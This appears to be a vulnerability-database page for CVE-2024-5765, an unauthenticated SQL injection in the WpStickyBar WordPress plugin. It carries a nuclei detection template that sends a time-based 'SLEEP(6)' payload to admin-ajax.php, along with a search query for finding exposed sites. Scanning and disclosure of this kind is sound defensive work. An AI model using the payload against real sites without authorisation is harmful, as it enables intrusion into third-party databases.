Lucene search
K

WpStickyBar <= 2.1.0 - SQL Injection

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

WpStickyBar version 2.1.0 SQL Injection via unauthenticated AJAX actio

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-5765
30 Jul 202409:02
circl
CNNVD
WordPress plugin WpStickyBar SQL注入漏洞
30 Jul 202400:00
cnnvd
CVE
CVE-2024-5765
30 Jul 202406:00
cve
Cvelist
CVE-2024-5765 WpStickyBar <= 2.1.0 - Unauthenticated SQLi
30 Jul 202406:00
cvelist
NVD
CVE-2024-5765
30 Jul 202406:15
nvd
OSV
CVE-2024-5765
30 Jul 202406:15
osv
Patchstack
WordPress WpStickyBar Plugin <= 2.1.0 is vulnerable to SQL Injection
30 Jul 202400:00
patchstack
Patchstack
WordPress WpStickyBar plugin <= 2.1.0 - Unauthenticated SQLi vulnerability
30 Jul 202406:40
patchstack
Positive Technologies
PT-2024-37132 · WordPress · Wpstickybar
30 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-5765
23 May 202508:59
redhatcve
Rows per page
id: CVE-2024-5765

info:
  name: WpStickyBar <= 2.1.0 - SQL Injection
  author: theamanrawat
  severity: high
  description: |
    The plugin does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection
  impact: |
    Unauthenticated attackers can execute time-based SQL injection attacks to extract sensitive database information including user credentials and configuration data.
  remediation: |
    Update WpStickyBar plugin to version 2.1.1 or later to address the SQL injection vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0b73f84c-611e-4681-b362-35e721478ba4/
    - https://wordpress.org/plugins/wpstickybar-sticky-bar-sticky-header/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5765
  classification:
    cve-id: CVE-2024-5765
    cwe-id: CWE-89
    epss-score: 0.27434
    epss-percentile: 0.97821
  metadata:
    max-request: 2
    verified: true
    fofa-query: body="/plugins/wpstickybar-sticky-bar-sticky-header"
  tags: time-based-sqli,cve,cve2024,sqli,wpscan,wordpress,wp-plugin,wp,wpstickybar,unauth,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/plugins/wpstickybar-sticky-bar-sticky-header")'
        internal: true

  - raw:
      - |
        @timeout: 15s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=stickybar_display&banner_id=1%20AND%20SLEEP(6);

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
        condition: and
# digest: 4a0a00473045022100d9001b26e46d4f8e5378221c45e41356006047ff5f8e4e1f4746711c8d8d5544022063940d806e4db928ca3da5b47307baa90ffe87b2c4fcdf6252142d93b948017d:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.27434
SSVC
30